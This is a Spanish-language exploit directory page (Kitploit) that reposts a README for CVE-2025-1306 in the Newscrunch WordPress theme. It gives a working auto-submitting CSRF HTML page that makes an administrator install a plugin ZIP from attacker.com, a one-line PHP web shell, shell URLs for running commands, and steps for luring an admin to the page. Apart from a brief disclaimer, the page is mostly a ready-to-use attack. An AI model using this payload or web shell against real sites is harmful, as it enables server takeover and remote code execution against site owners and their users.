Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2025-1306 — Newscrunch <= 1.8.4 - Cross-Site Request Forgery a Subida de Archivos Arbitraria | Kitploit
Herramientas/GitHubGitHub/nxploited/cve-2025-1306
Herramientas de PhishingGeneración de PayloadsExplotaciónExplotación de Aplicaciones WebAprendizaje y Educación
GitHubnxploited/cve-2025-1306

CVE-2025-1306

Newscrunch <= 1.8.4 - Cross-Site Request Forgery a Subida de Archivos Arbitraria

Ver Repositorio
53hace 1 añoAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

Exploit de Newscrunch (CVE-2025-1306)

🚨 Descripción general

Este exploit apunta a una vulnerabilidad de Cross-Site Request Forgery (CSRF) a Subida Arbitraria de Archivos (CVE-2025-1306) en el tema Newscrunch para WordPress. Debido a la falta de validación de nonce en la función newscrunch_install_and_activate_plugin(), un atacante no autenticado puede engañar a un administrador con sesión iniciada para que suba archivos arbitrarios al servidor, lo que lleva a Ejecución Remota de Código (RCE).


🔥 Detalles de la vulnerabilidad

  • ID CVE: CVE-2025-1306
  • Software afectado: Tema Newscrunch para WordPress (<= 1.8.4)
  • Clasificación CWE: CWE-352 - Cross-Site Request Forgery (CSRF)
  • Puntuación CVSS: 8.8 (ALTA)
  • Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H
  • Fecha de publicación: 4 de marzo de 2025

🛑 Gravedad e Impacto

  • ✅ Ejecución Remota de Código (RCE)
  • ✅ Compromiso total del sistema
  • ✅ Subida arbitraria de archivos basada en CSRF
  • ✅ Vector de ataque no autenticado

Explotabilidad: Requiere que un administrador visite un enlace malicioso diseñado.


📜 Código del exploit

Este exploit obliga a un administrador autenticado a ejecutar un ataque CSRF que sube un archivo ZIP malicioso que contiene una web shell.

🔹 PoC - Exploit HTML

root@kitploit:~
<!DOCTYPE html>
<html>
<head>
    <title>CSRF Exploit CVE-2025-1306 By Nxploit ,Khaled AlEnazi</title>
</head>
<body>
    <h2>Haga clic en cualquier lugar para cargar contenido...</h2>

    <script>
        function sendExploit() {
            var form = document.createElement("form");
            form.method = "POST";
            form.action = "http://target.com/wp-admin/admin-ajax.php?action=newscrunch_install_activate_plugin";

            var input = document.createElement("input");
            input.type = "hidden";
            input.name = "plugin_url";
            input.value = "http://attacker.com/shell.zip";

            form.appendChild(input);
            document.body.appendChild(form);
            form.submit();
        }

        
        window.onload = function() {
            sendExploit();
        };
    </script>
</body>
</html>

📌 Reemplazar:

  • http://target.com/ por el sitio WordPress vulnerable
  • http://attacker.com/shell.zip por un payload ZIP malicioso que contenga una web shell.

🔹 Ejemplo de shell PHP malicioso

root@kitploit:~
<?php system($_GET['cmd']); ?>

📌 Después de una explotación exitosa, acceda al shell:

root@kitploit:~
http://target.com/wp-content/plugins/shell.php?cmd=whoami

🚀 Cómo usarlo

  1. Aloje el archivo HTML en un sitio web controlado por el atacante.
  2. Envíe el enlace malicioso a un administrador de WordPress autenticado.
  3. Una vez que el administrador visite la página, el shell se sube automáticamente.
  4. Ejecute comandos de forma remota usando:
    root@kitploit:~
    http://target.com/wp-content/plugins/shell.php?cmd=ls
    

⚠️ Descargo de responsabilidad

Esta herramienta es solo con fines educativos y de investigación en seguridad. La explotación no autorizada de vulnerabilidades es ilegal y está penada por la ley. El autor no se hace responsable de ningún uso indebido o daño causado por esta herramienta. Úsela responsablemente.

Descargar herramienta